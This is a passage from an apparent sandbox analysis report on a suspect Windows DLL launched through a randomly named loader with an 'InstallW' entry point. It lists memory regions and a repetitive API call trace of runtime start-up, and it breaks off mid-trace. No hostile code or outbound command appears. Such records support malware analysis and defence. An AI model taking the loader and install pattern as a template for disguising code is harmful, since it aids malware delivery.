= 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 3222 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 3223 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3224 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 3225 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3226 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3227 start_va = 0x5f0000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3228 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3229 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3230 start_va = 0x720000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Thread: id = 163 os_tid = 0xec0 [0037.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f74c | out: lpSystemTimeAsFileTime=0x26f74c*(dwLowDateTime=0xe3caacd0, dwHighDateTime=0x1d3dfba)) [0037.091] GetCurrentProcessId () returned 0xebc [0037.091] GetCurrentThreadId () returned 0xec0 [0037.091] GetTickCount () returned 0x1862f [0037.091] QueryPerformanceCounter (in: lpPerformanceCount=0x26f744 | out: lpPerformanceCount=0x26f744*=380173067) returned 1 [0037.091] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0037.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.092] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.093] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.093] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.093] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0037.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.093] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0037.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.093] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.093] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0037.094] GetCurrentThreadId () returned 0xec0 [0037.094] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0037.094] GetEnvironmentStringsW () returned 0x307908* [0037.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0037.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7109f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0037.094] FreeEnvironmentStringsW (penv=0x307908) returned 1 [0037.094] GetStartupInfoA (in: lpStartupInfo=0x26f69c | out: lpStartupInfo=0x26f69c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0037.094] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0037.094] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0037.094] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0037.094] SetHandleCount (uNumber=0x20) returned 0x20 [0037.094] GetLastError () returned 0x0 [0037.094] SetLastError (dwErrCode=0x0) [0037.094] GetLastError () returned 0x0 [0037.094] SetLastError (dwErrCode=0x0) [0037.094] GetLastError () returned 0x0 [0037.094] SetLastError (dwErrCode=0x0) [0037.094] GetACP () returned 0x4e4 [0037.094] GetLastError () returned 0x0 [0037.094] SetLastError (dwErrCode=0x0) [0037.094] IsValidCodePage (CodePage=0x4e4) returned 1 [0037.094] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f67c | out: lpCPInfo=0x26f67c) returned 1 [0037.094] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f148 | out: lpCPInfo=0x26f148) returned 1 [0037.095] GetLastError () returned 0x0 [0037.095] SetLastError (dwErrCode=0x0) [0037.095] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26f0d8 | out: lpCharType=0x26f0d8) returned 1 [0037.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f55c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f55c, cbMultiByte=256, lpWideCharStr=0x26eec8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0037.095] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x26f15c | out: lpCharType=0x26f15c) returned 1 [0037.095] GetLastError () returned 0x0 [0037.095] SetLastError (dwErrCode=0x0) [0037.095] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0037.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f55c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f55c, cbMultiByte=256, lpWideCharStr=0x26ee98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.095] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.095] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26ec88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f45c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÒP\x83õ\x94ö&", lpUsedDefaultChar=0x0) returned 256 [0037.095] GetLastError () returned 0x0 [0037.095] SetLastError (dwErrCode=0x0) [0037.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f55c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f55c, cbMultiByte=256, lpWideCharStr=0x26eeb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.095] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.095] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26eca8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0037.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f35c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÒP\x83õ\x94ö&", lpUsedDefaultChar=0x0) returned 256 [0037.095] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.095] GetLastError () returned 0x0 [0037.095] SetLastError (dwErrCode=0x0) [0037.095] GetLastError () returned 0x0 [0037.095] SetLastError (dwErrCode=0x0) [0037.095] GetLastError () returned 0x0 [0037.095] SetLastError (dwErrCode=0x0) [0037.095] GetLastError () returned 0x0 [0037.095] SetLastError (dwErrCode=0x0) [0037.095] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.096] SetLastError (dwErrCode=0x0) [0037.096] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.097] GetLastError () returned 0x0 [0037.097] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.098] SetLastError (dwErrCode=0x0) [0037.098] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 [0037.099] SetLastError (dwErrCode=0x0) [0037.099] GetLastError () returned 0x0 